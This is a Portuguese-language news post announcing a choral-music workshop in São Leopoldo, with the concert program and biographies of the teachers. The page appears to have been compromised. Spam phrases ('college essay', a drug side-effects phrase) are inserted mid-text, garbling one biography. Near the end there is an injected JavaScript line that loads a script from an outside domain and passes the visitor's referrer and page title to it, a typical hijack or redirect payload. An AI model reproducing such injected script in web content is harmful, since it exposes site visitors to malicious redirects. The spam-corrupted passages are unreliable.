MovimentoMúsica coralNotícia

Canto Coral é destaque em São Leopoldo

Estão abertas as inscrições para Oficinas de Música – Canto Coral, que vai reunir vários sotaques e técnicas em São Leopoldo.


Em sua terceira edição, sempre realizado em São Leopoldo pela Presto Produções Artísticas,  com a coordenação geral da cantora e professora de técnica vocal Lúcia Passos e com a coordenação pedagógica da professora e regente  Agnes Schmeling, o evento  intitulado: “Oficinas de Música – Canto Coral”   deste ano será realizado de  19 a 23 de julho no Colégio São Luis, Rua Bento Gonçalves, 1375,  e vai reunir  conceituados professores especializados na linguagem do Canto Coral,  oriundos de várias partes do Brasil e do exterior.

A edição de julho do Projeto MusiCâmara com o concerto do Madrigal Presto na Igreja do Relógio, dia 19/7, terça-feira, vai marcar a abertura da programação artística  do evento que, entre as apresentações terá o Quinteto de Cordas Internacional-Brasil/Estados Unidos (ver programação completa abaixo).

Com destaque para Per Ekedahl (Suécia), que vai ministrar as oficinas de Regência para Coro Adulto e Prática Coral,  também  integram o elenco de professores:   Lúcia Passos (Brasil/RS-Coord. Artística Presto e Coro Municipal São Leopoldo),  Agnes Schmeling (Brasil/RS-Projeto Prelúdio/UFRGS), Carolina Ponso (Mestranda FACED/UFRGS), João Paulo Sefrin (RS/Brasil), e Teresa Mateiro (Brasil/SC-UDESC).

Objetivos: Segundo Lúcia Passos, as oficinas têm como objetivo  promover o intercâmbio e a troca de experiências entre os regentes e professores participantes, bem como incentivar o movimento coral através do contato com professores de renome no canto coral brasileiro e internacional. “A ideia é incentivar  os professores que já trabalham e também os que passarão a trabalhar com música na sala de aula”, diz.

Oficinas: Regência Coro Adulto,  Técnica Vocal, Didática e regência de Coro Infanto-juvenil, Música na escola – educação infantil e anos iniciais, Música na escola – ensino fundamental e médio e Prática Coral 1 e 2.

Público Alvo: Destinadas para regentes, estudantes e professores de música, professores da escola formal e demais interessados no canto coral e no desenvolvimento vocal.

Inscrições: Com vagas limitadas, as inscrições estão abertas até o dia 19 de julho.

Informações: Telefones: 51 3037.7784 e 9278.5967www.prestosl.com.br – E-mail: contato@prestosl.com.brRua Lindolfo Collor, 263 – Centro – São Leopoldo – RS

Projeto MusiCâmara de julho integra a Programação Artística: O evento vai oferecer programação artística com entrada  franca na Igreja do Relógio e no Teatro Municipal – Centro Cultural José Pedro Boéssio.  A abertura da programação será marcada pela apresentação de concerto com o Madrigal Presto, que também marcará  a edição de julho do Projeto MusiCâmara e será realizada  com entrada franca, no dia 19/7, às 20 horas, na Igreja do Relógio, Rua Oswaldo Aranha, 450,  bairro Centro,  São Leopoldo (ver toda programação artística abaixo).


PROGRAMAÇÃO ARTÍSTICA
– Entrada franca
Projeto MusiCâmara – Dia 19 de julho, terça-feira, 20h. – Igreja do Relógio (Rua Oswaldo Aranha, 450 – Centro – São Leopoldo)

Quinteto de Cordas Internacional – Brasil/Estados Unidos  – Coordenação do Prof. Milton Masciadri Dia 21 de julho, quinta-feira, 20h. – Igreja do Relógio (Rua Oswaldo Aranha, 450 – Centro – São Leopoldo) – Nico Fávero (violino), Felipe Avellar de Aquino (violocencelo), Kate Hamilton (viola), Milton Masciadri (contrabaixo) e Martin Münch (piano). Entre as composições que formam o programa estão:  Sarabanda da Suíte No. 3 para violoncelo solo, em Dó maior, de J.S. Bach, – Song of the Birds  de Pablo Casals (Arr. para violoncelo solo) e Passacaglia de handel halvorsen para violino e  viola

– Encontro de Coros – Dia 22 de julho, sexta-feira, 20h. – Teatro Municipal – Centro Cultural José Pedro Boéssio (Rua Osvaldo Aranha, 934 – Centro – São Leopoldo)

– Mostra das oficinas – Dia 23 de julho, sábado, 20h – Teatro Municipal Centro Cultural José Pedro Boéssio (Rua Osvaldo Aranha, 934 – Centro – São Leopoldo)

Programa do Madrigal Presto

Gerald Finzi
My Spirit Sang all Day

Negro Spiritual
Deep River
– Arranjo Cozzella

I want Jesus
– Arranjo Jester Hairstonz

Giovanni Pierluigi da Palestrina
Tu es Petrus

Johannes Brahms
O süsser Mai
Das Mätchen

Antônio Vaz
Pater Noster

Eric Whitacre
Lux Aurumque

João Paulo Sefrin
Quintanares
– Texto: MarioQuintana

Franz Biebl
Ave Maria
Currículos professores

PER EKEDAHL – Suécia

Per Ekedahl é Mestre em música pela Royal College of Music, Estocolmo (Suécia), onde estudou regência coral com Robert Sund. Entretanto, sua maior influência foi definitivamente o maestro Eric Ericson com quem estudou vários anos. Cantou, durante 15 anos, como tenor em quatro corais profissionais regidos pelo reconhecido maestro sueco, com os quais realizou mais de trinta turnês internacionais. Como regente coral Per Ekedahl trabalhou com corais juvenis, coros mistos e masculinos, assim como regeu coros de câmara de elevado nível artístico. Em 1996, em Praga (República Tcheca), foi premiado com medalha de ouro em uma competição internacional de coros. Nos últimos anos trabalhou como produtor de concertos, especialmente, para crianças e jovens. Internacionalmente, além de ser convidado como palestrante em eventos culturais, tem sido membro ativo da Organização Jeunesses Musicales International (JMI), sendo Presidente desde 2008.

CAROLINE CAO PONSO – Brasil-UFRGS

Caroline Cao Ponso é licenciada em Música pela UFRGS e especialista em Artes e Ed. Física pelo CAEF/UFRGS. Atualmente cursa o Mestrado em Educação na FACED/UFRGS, pesquisando a concepção das crianças sobre a música. É professora do município de Porto Alegre, onde ministra aulas de música e canto coral nas Séries Iniciais e na Educação Infantil. É autora do livro Música em Diálogo: Ações Interdisciplinares na Educação Infantil, editora Sulina, 2008. Já ministrou cursos para professores no Projeto POEMA/OSPA, na SMED/POA e nos cursos de extensão para professores do PPGMUS/UFRGS. É através da pesquisa e da prática integrada que a autora visualiza uma abrangência maior da música no cotidiano da escola e na aprendizagem musical das crianças.

college essay

>TERESA MATEIRO-Brasil/SC-UDESC

Professora do Departamento de Música da Udesc e da Escola de Música, Arte e Teatro da Universidade de Örebro (Suécia). Doutora em Filosofia e Ciências da Educação – Educação Musical pela Universidade do País Vasco (Espanha), mestre e licenciada em Educação Musical pela UFRGS.  Atua e pesquisa na área de formação de professores, privilegiando temas como prática pedagógica, programas curriculares, práticas musicais escolares e estudos transculturais. É co-autora dos livros ‘Práticas de Ensinar Música’ (Sulina, 2009) e ‘Pedagogias em Educação Musical’ (IBPEX, 2011).

LÚCIA PASSOS

Mineira radicada há 32 anos no Rio Grande do Sul. É cantora e Professora de Técnica Vocal tendo atuado na Universidade do Vale do Rio do Sinos- UNISINOS durante 26 anos. Contratada pela FUNARTE ministrou cursos em todo o Brasil orientando regentes, cantores e professores de Técnica Vocal. Iniciou sua formação musical em Minas Gerais e, em busca de aperfeiçoamento, foi para o Rio de Janeiro onde estudou com a professora Clarisse Stukart. Estudou no Mozarteum, em Salzburg, na Áustria, e também em Münster, na Alemanha, com os professores Rita Streich, Paula Lindberg e Peter Ziethen. Realizou recitais em vários estados do Brasil e também na Áustria e Alemanha, apresentando repertório internacional e de compositores brasileiros.  Atuou como solista da Orquestra Sinfônica Brasileira, Orquestra  Sinfônica de Minas Gerais,   Orquestra de Câmara da OSPA e   Orquestra  de Câmara do Theatro São Pedro e Orquestra SESI /FUNDARTE.

Foi Coordenadora Cultural da Unisinos durante 5 anos, desenvolvendo e incentivando projetos culturais como a Orquestra Unisinos, Projeto Sinos Acorda e Movimento Coral Unisinos. Em abril de 2007 ministrou um Oficina de Técnica Vocal para todos os regentes dos coros da PETROBRAS no Rio de Janeiro. Há mais de 10 anos é professora de Técnica Vocal nos painéis de regência coral da Federação de Coros do Rio Grande do Sul. Em 2007 realizou oficinas de Técnica Vocal em 6 cidades do Rio Grande do Sul através das prefeituras locais. Atualmente realiza recitais, cursos e oficinas de Técnica Vocal e Canto, visando o aprimoramento vocal de cantores, atores e professores, através da PRESTO – Produções e Promoções Artísticas. Em 2008 e 2009 realizou oficinas permanentes para o Coral Municipal de Caxias do Sul e coros do Instituto de Educação Ivoti (IEI), tendo atuado também no curso de extensão promovido pela Instituto Superior de Educação Ivoti (ISEI). É coordenadora artística do Projeto MusiCâmara em São Leopoldo, que tem parceria com a Secretaria Municipal de Educação, desenvolvendo atividade didática nas escolas municipais.

JOÃO PAULO SEFRIN – (Brasil/RS-UNISINOS)

Bacharel em Música,com habilitação em Regência, é formado pelo Instituto de Artes da Universidade Federal do Rio Grande do Sul, onde foi aluno do maestro Arlindo Teixeira. Iniciou seus estudos musicais através do violão clássico, tendo sido aluno de Nestor Ausqui, Sérgio Assad e Eduardo Castañera. Entre 1988 e 1999, regeu a Orquestra Jovem da UFRGS, a princípio como regente assistente, assumindo integralmente a orquestra a partir de 1990. Com esta orquestra se apresentou em várias cidades do Rio Grande do Sul, Santa Catarina e São Paulo, realizando constantes intercâmbios com solistas, corais, orquestras jovens de universidades e escolas de música, como a Orquestra Juvenil de Jundiaí-SP, Orquestra Experimental de São Carlos-SP, além da Orquesta de Jóvenes, de Córdoba, Argentina, com a qual participou da montagem do ballet Dom Quixote, junto ao Ballet Gutierres, de Porto Alegre.

Desenvolveu também vários cursos de preparação para jovens músicos, trabalhando elementos musicais como leitura de partitura e prática de orquestra. Desde 1995 é regente e diretor musical do grupo Vocal Mandrialis, grupo vocal/cênico, com o qual participou da montagem dos espetáculos “Mandrialis em Papo Firme” (ganhador do Troféu Açorianos de “Melhor Espetáculo -1996”), “Tangos, Boleros y Otras Cositas Más”, “Mandralis Acústico”, comemorando os 15 anos do grupo e o espetáculo “Paisagens”, atualmente em atividade, que reúne músicas de compositores gaúchos, exclusivamente. Além da direção musical, é responsável pela criação de arranjos vocais e instrumentais e de composições próprias. Entre 1996 e 2001 regeu o Coral da Assembléia Legislativa do Estado do RS, com o qual desenvolveu vários projetos de caráter didático, como ensaios abertos, apresentações didáticas em escolas estaduais, além de reger o coral em concertos e sessões solene. Entre 1996 e 1997 foi Professor Substituto do Instituto de artes da UFRGS, atuando nas disciplinas de Canto Coral, Regência, Arranjos Vocais e Prática de Orquestra.

Entre 1992 e 2010 foi regente do Coral Unisinos, no qual ingressou em 1990, como cantor e monitor de naipes. Com este grupo participou da realização do CD “Coral Unisinos”, comemorativo aos 25 anos da universidade, lançado em 1994, com uma coletânea de gravações realizadas entre os anos de 1983 e 1993 e o CD “Belo Belo”, lançado em 2001, exclusivamente com música brasileira. Deste Cd faz parte, além de arranjos vocais, sua composição “Quintanares”, sobre poesia de Mário Quintana, com a qual participou do Projeto Encompor, mostra de obras de compositores contemporâneos, no ano de 1998. Entre 2001 e 2005 atuou à frente da Orquestra Unisinos como regente assistente, regendo concertos da temporada oficial, além de atuar na preparação e ensaios da orquestra. Neste período regeu concertos com renomados solistas como Anatole Krastev (Bulgária), Pierre Dutot (França), Ângela Diel, Fábio Zanon, Marcelo Coutinho, Turíbio Santos, Antônio Del Claro, Laura de Souza, entre outros.

No âmbito da música popular realizou concertos com artistas como Nei Lisboa, Guinga, Kleiton e Kledir, Alegre Correa, Hique Gomes, entre outros. Participou ainda da gravação do CD “Orquestra Unisinos”, em comemoração aos 35 anos da universidade, com peças de Domenico Zipoli e José Maurício Nunes Garcia. Entre janeiro e março de 2005, esteve na UGA (Universidade da Geórgia-Estados Unidos), estudando regência orquestral com o Maestro Mark Cedel, como aluno convidado. Tem atuado como regente convidado em orquestras da região, como a Orquestra de Câmera do Theatro São Pedro, Orquestra Sinfônica da UCS – Caxias do Sul e também da Orquestra de Câmera Fundarte, de Montenegro, com a qual percorreu o interior do estado regendo concertos do projeto Sesi Catedrais, além da ópera “La Serva Padrona”. Desde o final de 2006 integra o grupo que formatou e lançou o Curso Superior de Formação Específica de Produtores e Músicos de Rock, na Unisinos, onde atua como coordenador e professor nas atividades de Teoria lisinopril 20 mg side effects Musical, Harmonia e História da Música. Desde 2008 rege o Madrigal Presto. Entre 2009 e 2010 regeu o Coral SESC – POA

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

movimento.com
Responsável pela inclusão de programação e assuntos genéricos no blog.